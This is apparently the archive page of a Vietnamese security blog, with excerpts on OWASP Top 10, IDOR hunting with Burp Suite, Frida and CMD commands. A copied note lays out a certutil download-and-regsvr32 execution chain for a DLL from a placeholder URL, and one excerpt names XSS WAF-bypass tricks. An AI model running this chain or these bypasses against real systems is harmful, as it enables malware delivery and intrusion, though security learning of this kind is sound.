Category Archives: nhattruong.blog

Cách đăng ký ChatGPT OpenAI tại Việt Nam

Xin chào mọi người, gần đây có một website được nhiều người quan tâm của OpenAI là ChatGPT, nó rất thú vị và có khả năng thay thế Stack Overflow. Tuy nhiên, hiện chỉ có 156 quốc gia được đăng kí sử dụng (trừ Việt Nam). Mình sẽ giúp các bạn đăng kí dễ dàngContinue reading “Cách đăng ký ChatGPT OpenAI tại Việt Nam”

Tóm tắt OWASP

OWASP Top 10 là một tài liệu tiêu chuẩn nâng cao nhận thức cho các developer và các nhà bảo mật. Hàng năm, tổ chức OWASP sẽ đi thu thập các thông tin về số lượng các loại lỗ hổng được khai thác nhiều nhất trên thế giới, và tổng hợp lại thành bộ OWASPContinue reading “Tóm tắt OWASP”

Săn IDOR với Extention của BurpSuite

IDOR – một lỗ hổng web thuộc danh mục Broken Access Control được cho là dễ khai thác (nhưng chưa chắc dễ phát hiện ) lần đầu được ghi danh trên OWASP TOP 10 từ năm 2007. Qua hơn mười năm phát triển về công nghệ lẫn nhận thức, hiện nay sự hiện diện củaContinue reading “Săn IDOR với Extention của BurpSuite”

Những câu lệnh CMD phổ biến trong Windows

Khi nhắc đến Windows thì thì ai trong chúng ta khi sử dụng máy tính đều biết tới hệ điều hành vô cùng phổ biến này. Ở bài viết này thì mình sẽ chỉ ra những câu lệnh Command Prompt hay còn gọi là cmd phổ biến ở trong Windows. À mà trước khi sửContinue reading “Những câu lệnh CMD phổ biến trong Windows”

Top 10 lỗ hổng bảo mật web phổ biến theo chuẩn OWASP – OWASP TOP 10 (2013)

(Bài viết được tham khảo tại Top 10 lỗ hổng bảo mật web phổ biến theo chuẩn OWASP – OWASP TOP 10 – CyStack Resources) Lưu ý: OWASP TOP 10 này từ năm 2013, chưa update nhưng vẫn rất hữu ích với người mới OWASP là một tiêu chuẩn toàn cầu để phục vụ việc kiểmContinue reading “Top 10 lỗ hổng bảo mật web phổ biến theo chuẩn OWASP – OWASP TOP 10 (2013)”

Frida toàn tập [Part 1]

I. Giới thiệu về Frida Frida tương tự như Greasemonkey tool (trên firefox) cho native app, về mặt kỹ thuật, nó được gọi là dynamic code instrumentation toolkit. Nó cho phép ta inject một đoạn mã JavaScript hoặc một thư viện ta tự tạo vào trong native app trên bất kỳ hệ điều hành nàoContinue reading “Frida toàn tập [Part 1]”

[Note] tải file windows với Certutil

copy: http://carnal0wnage.attackresearch.com/2017/08/certutil-for-delivery-of-files.html 1. Create your DLL 2. Base64encode it (optional) 3. Use certutil.exe -urlcache -split -f http://example/file.txt file.blah to pull it down   4. Base64decode the file with certutil 5. Execute the dll with regsvr32 regsvr32 /s /u mydll.dll

Một số cách bypass XSS filter

Sau đây là một số cách bypass XSS filter dị dị sưu tầm được, anh em có thể trải nghiệm Cloudflare XSS Bypass XXS Bypass Imperva WAF Bypass WAF Amazon Crlf injection to bypass javascript: Đang bị bờ lách lít Trong trường hợp svg onload= bị filter, %0d sẽ đóng vai trò dấu ngăn cách vàContinue reading “Một số cách bypass XSS filter”